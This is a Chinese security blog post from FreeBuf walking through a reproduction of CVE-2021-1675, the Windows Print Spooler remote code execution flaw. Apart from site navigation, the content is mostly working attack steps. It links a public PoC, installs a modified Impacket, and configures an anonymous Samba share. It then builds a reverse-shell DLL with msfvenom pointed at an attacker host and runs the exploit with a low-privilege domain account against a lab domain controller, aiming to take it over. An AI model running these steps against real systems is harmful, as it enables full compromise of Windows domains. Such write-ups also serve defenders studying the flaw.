freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2021-1675 Windows Spooler Service RCE复现
2021-07-04 12:00:46

一、漏洞Poc

https://github.com/cube0x0/CVE-2021-1675

二、环境配置

1、添加一个普通的域用户

漏洞的使用就是当你在渗透时拥有了一个普通的域成员,可以利用此漏洞去攻击域控,执行命令,直接拿下域控

image-20210703111800644

这里涉及到符号转义问题,只做复现密码随便来一个Passw0rd

image-20210703112013322

2、检查Spooler是否开启(默认开启)

这个肯定是默认开启的,不开启这个功能就无法实现打印

Spooler打印功能,会加载dll文件,通过进程树查看,可以看到是system权限,因为spoolsv.exe是x64的,所以生成的dll也得是x64

image-20210703112538655

三、复现

1、在运行漏洞利用之前,需要安装作者的 Impacket 包

pip3 uninstall impacket

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

这里就不演示了,复制粘贴命令即可

2、开启匿名访问smb

2.1、修改/etc/samba/smb.conf

这里使用原作者的不行(反正我不行)......就用自己了

[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5

[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

image-20210703113245223

2.2、实际测试下

image-20210703113721565

可以访问smb目录即可,这里的smb就是/tmp

image-20210703113752310

2.3、可能存在的问题

2.3.1、如果报错error什么0x5的,就是无法匿名访问

2.3.2、如果在windows里操作,访问smb,提示什么权限这样那样的,那你就要注意路径的权限问题

3、MSF生成木马,CS也一样,开启监听

3.1、在tmp目录下生成.dll木马

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.128 lport=6666 -f dll -o reverse.dll

image-20210703114233226

3.2、开启监听

image-20210703114829370

4、利用Poc

4.1、看下帮助文档

python3 CVE-2021-1675.py -h

4.2、构造POC利用

python3 CVE-2021-1675.py 普通域用户:域用户密码@DC的IP地址 '开启的匿名访问'

python3 CVE-2021-1675.py oa:Passw0rd@10.10.10.165 '\\10.10.10.128\smb\reverse.dll'

image-20210703115110653

乱码可以使用下面命令解决

chcp 65001
# 渗透测试 # web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录